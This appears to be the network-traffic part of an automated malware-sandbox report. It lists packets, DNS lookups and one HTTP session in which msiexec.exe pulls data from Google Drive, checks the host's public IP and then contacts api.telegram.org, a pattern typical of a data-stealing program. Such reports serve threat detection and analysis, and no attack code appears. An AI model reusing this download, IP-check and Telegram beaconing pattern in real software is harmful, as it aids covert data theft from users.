                                                                                                                                                                          Dec 16, 2024 16:33:24.923470020 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.925756931 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.925877094 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.926306963 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.926371098 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.926383018 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.926436901 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.931792974 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.931862116 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.931874037 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.931932926 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.934662104 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.934730053 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.934775114 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.934834957 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.940026045 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.940098047 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.940140009 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.940188885 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.943062067 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.943133116 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.943170071 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.943228960 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.948863983 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.948930025 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.948975086 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.949033976 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.951239109 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.951340914 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.951364994 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.951422930 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.955044031 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.955112934 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.955125093 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.955178022 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.958992004 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.959075928 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.959088087 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.959148884 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.962843895 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.962915897 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.962928057 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.962991953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.966850042 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.966933966 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.966984034 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.967044115 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.970443964 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.970505953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.970557928 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.970614910 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.974214077 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.974288940 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.974406004 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.974457979 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.977859974 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.977922916 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.977952003 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.978003025 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.981705904 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.981776953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.981801033 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.981854916 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.985214949 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.985277891 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.985325098 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.985378981 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.989025116 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.989109039 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.989137888 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.989192009 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.992377996 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.992469072 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.992515087 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.992574930 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.995515108 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.995590925 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.995604992 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.995668888 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.998914003 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.998991966 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.999034882 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.999087095 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.001689911 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.001754045 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.001791000 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.001848936 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.004848957 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.004915953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.004970074 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.005017042 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.007838964 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.007895947 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.007949114 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.008013964 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.010957003 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.011023045 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.011131048 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.011183023 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.013906956 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.013962984 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.014023066 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.014084101 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.014410019 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.014452934 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.016993999 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.017040014 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.017427921 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.017473936 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.020472050 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.020515919 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.020730019 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:44.953243017 CET49848443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:44.960304022 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:44.961662054 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.095797062 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:45.095813036 CET8049842158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:45.095916033 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.095999956 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.096046925 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.215980053 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.300425053 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.301683903 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:46.301776886 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.302038908 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:46.302228928 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:46.302253008 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.345386028 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:47.546794891 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:47.548983097 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:47.549009085 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.283477068 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.283633947 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.283699036 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:48.284153938 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:48.288374901 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.289419889 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.408875942 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.409008980 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.409272909 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.409367085 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.409517050 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.531933069 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.648853064 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.650125027 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:49.650191069 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.650298119 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:49.650473118 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:49.650490999 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.689426899 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:50.878164053 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:50.879951000 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:50.880032063 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.799140930 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.799211979 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.799262047 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:51.799825907 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:51.805660009 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.806763887 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.960170031 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.960385084 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.960462093 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.961927891 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.961927891 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:52.082278967 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.168433905 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.169790983 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:53.169909000 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.170013905 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:53.170283079 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:53.170305014 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.220477104 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:54.517927885 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.519454956 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:54.519506931 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.968799114 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.968967915 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.969099045 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:54.969321012 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:54.993555069 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:55.113997936 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:55.114095926 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:55.132849932 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:55.132942915 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:55.133024931 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:55.133421898 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:55.133450985 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.519758940 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.520021915 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.529232979 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.529258013 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.529671907 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.579982042 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.587297916 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.631330967 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:57.030190945 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:57.030368090 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:57.030592918 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:57.032254934 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:02.894747972 CET4981880192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:34:03.093199968 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:03.093245029 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:03.093337059 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:03.093575954 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:03.093595982 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:04.463536024 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:04.465178013 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:04.465245008 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:04.465322018 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:04.465343952 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:05.167098999 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:05.167296886 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:05.167784929 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:05.168756962 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.695687056 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.695779085 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:06.695869923 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.696078062 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.696110964 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.080616951 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.082329035 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:08.082398891 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.082473040 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:08.082496881 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.695486069 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.696957111 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.697051048 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:10.731851101 CET49907443192.168.2.4149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 16, 2024 16:33:16.547719002 CET  61284        53         192.168.2.4  1.1.1.1
Dec 16, 2024 16:33:16.687407017 CET  53           61284      1.1.1.1      192.168.2.4
Dec 16, 2024 16:33:19.335721970 CET  57905        53         192.168.2.4  1.1.1.1
Dec 16, 2024 16:33:19.475506067 CET  53           57905      1.1.1.1      192.168.2.4
Dec 16, 2024 16:33:25.243374109 CET  58887        53         192.168.2.4  1.1.1.1
Dec 16, 2024 16:33:25.381164074 CET  53           58887      1.1.1.1      192.168.2.4
Dec 16, 2024 16:33:27.704869032 CET  52376        53         192.168.2.4  1.1.1.1
Dec 16, 2024 16:33:28.032845974 CET  53           52376      1.1.1.1      192.168.2.4
Dec 16, 2024 16:33:34.926011086 CET  64408        53         192.168.2.4  1.1.1.1
Dec 16, 2024 16:33:35.098680019 CET  53           64408      1.1.1.1      192.168.2.4
Dec 16, 2024 16:33:54.994133949 CET  55120        53         192.168.2.4  1.1.1.1
Dec 16, 2024 16:33:55.132142067 CET  53           55120      1.1.1.1      192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 16:33:16.547719002 CET | 192.168.2.4 | 1.1.1.1 | 0x9136 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:19.335721970 CET | 192.168.2.4 | 1.1.1.1 | 0x5980 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:25.243374109 CET | 192.168.2.4 | 1.1.1.1 | 0x5a05 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:27.704869032 CET | 192.168.2.4 | 1.1.1.1 | 0x9efc | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:34.926011086 CET | 192.168.2.4 | 1.1.1.1 | 0xb3e3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:54.994133949 CET | 192.168.2.4 | 1.1.1.1 | 0xa3ce | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 16:33:16.687407017 CET | 1.1.1.1 | 192.168.2.4 | 0x9136 | No error (0) | drive.google.com | - | 172.217.19.174 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:19.475506067 CET | 1.1.1.1 | 192.168.2.4 | 0x5980 | No error (0) | drive.usercontent.google.com | - | 142.250.181.97 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:25.381164074 CET | 1.1.1.1 | 192.168.2.4 | 0x5a05 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 16:33:25.381164074 CET | 1.1.1.1 | 192.168.2.4 | 0x5a05 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:25.381164074 CET | 1.1.1.1 | 192.168.2.4 | 0x5a05 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:25.381164074 CET | 1.1.1.1 | 192.168.2.4 | 0x5a05 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:25.381164074 CET | 1.1.1.1 | 192.168.2.4 | 0x5a05 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:25.381164074 CET | 1.1.1.1 | 192.168.2.4 | 0x5a05 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:28.032845974 CET | 1.1.1.1 | 192.168.2.4 | 0x9efc | No error (0) | reallyfreegeoip.org | - | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:28.032845974 CET | 1.1.1.1 | 192.168.2.4 | 0x9efc | No error (0) | reallyfreegeoip.org | - | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:35.098680019 CET | 1.1.1.1 | 192.168.2.4 | 0xb3e3 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 16:33:35.098680019 CET | 1.1.1.1 | 192.168.2.4 | 0xb3e3 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:35.098680019 CET | 1.1.1.1 | 192.168.2.4 | 0xb3e3 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:35.098680019 CET | 1.1.1.1 | 192.168.2.4 | 0xb3e3 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:35.098680019 CET | 1.1.1.1 | 192.168.2.4 | 0xb3e3 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:35.098680019 CET | 1.1.1.1 | 192.168.2.4 | 0xb3e3 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 16:33:55.132142067 CET | 1.1.1.1 | 192.168.2.4 | 0xa3ce | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49800 | 193.122.6.168 | 80 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 16:33:25.506360054 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 16, 2024 16:33:26.778592110 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:26 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 6b22edee941efa853d0de5d1d41115cf
